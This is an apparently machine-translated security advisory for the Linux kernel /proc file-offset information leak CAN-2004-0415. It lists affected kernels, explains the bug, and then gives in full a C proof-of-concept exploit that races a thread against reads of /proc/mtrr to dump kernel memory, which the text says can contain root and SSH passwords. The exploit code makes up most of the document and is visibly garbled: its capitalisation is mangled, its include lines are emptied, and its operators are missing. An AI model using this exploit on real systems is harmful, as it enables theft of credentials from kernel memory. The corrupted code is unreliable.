Linux kernel file OFFSET Pointer Sensitive Information Leak Vulnerability
Affected system:
Linux kernel 2.6.7
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1
Linux kernel 2.6
Linux kernel 2.4.9
Linux kernel 2.4.8
Linux Kernel 2.4.7
Linux kernel 2.4.6
Linux kernel 2.4.5
Linux kernel 2.4.4
Linux kernel 2.4.3
Linux kernel 2.4.26
Linux kernel 2.4.25
Linux kernel 2.4.24
Linux kernel 2.4.23
Linux kernel 2.4.22
Linux kernel 2.4.21
Linux Kernel 2.4.20
Linux Kernel 2.4.2
Linux kernel 2.4.19
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux Kernel 2.4.15
Linux Kernel 2.4.14
Linux Kernel 2.4.13
Linux Kernel 2.4.12
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux Kernel 2.4.1
Linux Kernel 2.4
Linux kernel 2.4.18
- CONECTIVA Linux 8.0
- CONECTIVA Linux 7.0
- Debian Linux 3.0
- Mandrake Linux 9.0
- Mandrake Linux 8.2
- Redhat Linux 8.0
- Redhat Linux 7.3
description:
CVE (CAN) ID:
CAN-2004-0415
Linux is an open source operating system.
The Linux kernel exists when the 64-bit file offset pointer is handled, and the local attacker can use this vulnerability to obtain sensitive information in the kernel memory.
Linux kernel Provides file processing API for user space applications, generally said that a file can be identified by file name and to open a file descriptor for returning kernel file objects via an OPEN (2) system call.
One of the properties of the file object becomes a file offset (File Offset), and each read-write is read from the location of the OFFSET record. In addition, the current read / write position in the media on the media is also changed via Lseek (2) system.
In the nearest Linux, which contains two different versions of file processing API: Old 32-bit and new 64-bit (LFS) API. The ISEC team found that multiple code incorrectly converted from 64-bit size file offset to 32-bit file offset, which can cause unsafe access to file offset member variables.
ISEC discovers most / proc / version (such as / proc / version) leaks uninitialized kernel memory pages, can be used by attackers to obtain sensitive information.
Use the / proc / mtrr file to read a large number of kernel memory information, including the root password, OpenSSH login password, and the like. For detailed use of methods, see the following information:
Http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
<* Source: Paul Starzetz
Paul@starzetz.de)
link:
Http://marc.theaimsgroup.com/?l=bugtraq&m=109164345729894&w=2
*>
testing method:
Police Operations (Methods) may have an aggressive, only for safety research and teaching. Users are at your own risk! Paul Starzetz (Paul@starzetz.de) provides the following test methods:
/ *
* gcc -o3 proc_kmem_dump.c -o proc_kmem_dump
*
* CopyRight (C) 2004 ISEC Security Research. All Rights Reserved.
*
* This Program Is for Educational Purposes * ONLY * IT IS Provided "As IS"
* And with welyi, printing, distribution, modification
* WITHOUT Permission of The Author is strictly prohibited.
*
* /
#define _GNu_Source
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
// define machine MEM SIZE IN MB
#define memsize 64
_syscall5 (int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
UINT, WH);
Void Fatal (Const Char * MSG)
{
Printf ("/ n");
IF (! errno) {
FPrintf (stderr, "fatal error:% s / n", msg);
}
Else {
PERROR (MSG);
}
Printf ("/ n");
Fflush (stdout);
Fflush (stderr);
Exit (31337);
}
Static int CPID, NC, FD, PFD, R = 0, I = 0, CSIZE, FSIZE = 1024 * 1024 * MEMSIZE,
Size = Page_Size, US;
Static Volatile Int Go [2];
Static Loff_T OFF;
Static char * buf = null, * file, child_stack [Page_size];
Static struct TimeVal TV1, TV2;
STATIC STRUCT Stat;
// CHild Close Sempahore & Sleep
INT Start_child (Void * Arg)
{
// unlock Parent & Close Semaphore
Go [0] = 0;
MADVISE (file, csize, madv_dontneed);
Madvise (File, CSIZE, MADV_SEQUENTIAL); GetTimeOfDay;
READ (PFD, BUF, 0);
GO [0] = 1;
R = MADVISE (file, csize, madv_willneed);
IF (r)
Fatal ("MADVISE");
// parent blocked on mmap_sem? Good!
IF (Go [1] == 1 || _llseek (PFD, 0, 0, & Off, Seek_cur) <0) {
R = _llseek (PFD, 0x7ffff, 0xfffffff, & off, seek_set);
IF (r == -1)
Fatal ("Lseek");
Printf ("/ n [ ] race won!"); FFLUSH (stdout);
GO [0] = 2;
} else {
Printf ("/ n [-] RACE LOST% D, USE ANOTHER FILE! / N", GO [1]);
Fflush (stdout);
Kill (getPpid (), SIGTERM;
}
_exit (1);
Return 0;
}
Void usage (char * name)
{
Printf ("/ NUSAGE:% S
Printf ("/ n / n");
Exit (1);
}
INT Main (int AC, char ** av)
{
IF (AC <2)
USAGE (AV [0]);
// mmap big file not in cache
R = Stat (AV [1], & ST);
IF (r)
Fatal ("stat file");
CSIZE = (st.st_size (page_size-1)) & ~ (page_size-1);
FD = Open (AV [1], O_RDonly);
IF (fd <0)
Fatal ("Open file");
File = mmap (null, csize, prot_read, map_shared, fd, 0);
IF (file == map_failed)
Fatal ("MMAP");
Close (FD);
Printf ("/ n [ ] mmaped uncached file at% P -% P", File, File Csize;
Fflush (stdout);
PFD = Open ("/ proc / mtrr", o_rdonly);
IF (PFD <0)
Fatal ("open");
FD = Open ("KMem.dat", O_RDWR | O_CREAT | O_TRUNC, 0644);
IF (FD <0)
Fatal ("Open Data");
R = ftruncate (fd, fsize);
IF (r <0)
Fatal ("ftruncate");
Buf = mmap (null, fsize, prot_read | prot_write, map_shared, fd, 0);
IF (buf == map_failed)
Fatal ("MMAP");
Close (FD);
Printf ("/ n [ ] mmaped kernel data file at% p", buf);
Fflush (stdout); // Clone Thread Wait for Child Sleep
NC = nice (0);
CPID = Clone (& start_child, child_stack sizeof (child_stack) -4,
Clone_files | Clone_VM, NULL;
NICE (19-NC);
While (Go [0] == 0) {
i ;
}
// Try to read & Sleep & Move Fpos to Be Negative
GetTimeOfDay; & TV1, NULL;
Go [1] = 1;
R = Read (PFD, BUF, SIZE);
GO [1] = 2;
GetTimeOfDay; & TV2, NULL;
IF (r <0)
Fatal ("Read");
While (Go [0]! = 2) {
i ;
}
US = TV2.tv_sec - TV1.tv_sec;
US * = 1000000;
US = (TV2.tv_usec - tv1.tv_usec);
Printf ("/ N [ ] Read% D Bytes In% D Usec", R, US); FFlush (stdout);
R = _llseek (PFD, 0, 0, & Off, Seek_cur);
IF (r <0) {
Printf ("/ N [ ] Success, Lseek Fails, Reading Kernel Mem ... / N");
Fflush (stdout);
i = 0;
For (;;) {
R = read (PFD, BUF, Page_Size);
IF (r! = Page_size)
Break;
BUF = Page_Size;
i ;
Printf ("/ r page% 6d", i); fflush (stdout);
}
Printf ("/ n [ ] done, err =% s", strrror (errno));
Fflush (stdout);
}
Close (PFD);
Printf ("/ n");
Sleep (1);
Kill (CPID, 9);
Return 0;
}
